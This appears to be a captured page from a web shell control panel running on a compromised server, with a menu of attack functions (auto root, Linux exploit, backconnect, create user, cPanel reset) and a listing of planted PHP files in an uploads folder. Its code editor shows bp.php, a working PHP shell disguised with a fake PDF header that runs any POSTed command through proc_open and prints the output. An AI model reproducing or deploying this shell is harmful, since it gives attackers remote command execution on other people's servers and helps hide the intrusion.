Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.217.162.18
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
uploads /
home /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
465.43
KB
-rw-r--r--
alpha.php
173.83
KB
-rw-r--r--
b1.jpg
1.43
MB
-rw-r--r--
b2.jpg
810.47
KB
-rw-r--r--
b3.jpg
640.29
KB
-rw-r--r--
b4.jpg
1.49
MB
-rw-r--r--
b5.jpg
336.71
KB
-rw-r--r--
bp.php
1.11
KB
-rw-r--r--
conf.php
24.98
KB
-rw-r--r--
detect.php
32.91
KB
-rw-r--r--
kz.phtml
3.65
KB
-rw-r--r--
maimuna.php
14.04
KB
-rw-r--r--
miaw.php
160.56
KB
-r--r--r--
r.php
12.14
KB
-rw-r--r--
t.php
1.99
MB
-rw-r--r--
w50.php
1.45
KB
-rw-r--r--
we-es-o.php
78.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bp.php
%PDF-1.5 %���� 1 0 obj <!-- Unknown45 --> <!-- https://github.com/whoami-45 --> <font face=courier size=2><i>proc_open command execute by unknown45</i> | <?php print "\n";$disable_functions = @ini_get("disable_functions"); echo "<font face=courier size=2>disable func : <i><font color=red size=2> ".$disable_functions; print "\n"; ?><br></font> <form method="post"> <font face=courier new size=2>Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required><br> <button type="submit">Execute</button> </form><hr> <?php $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "r") // stderr is a file to write to ); $env = array('some_option' => 'aeiou'); $meki = ""; if(isset($_POST['cmd'])){ $cmd = ($_POST['cmd']); echo "<table width=100%><td><textarea cols=90 rows=25>"; $process = proc_open($cmd, $descriptorspec, $pipes, $meki, $env); echo stream_get_contents($pipes[1]); die; } ?>
Close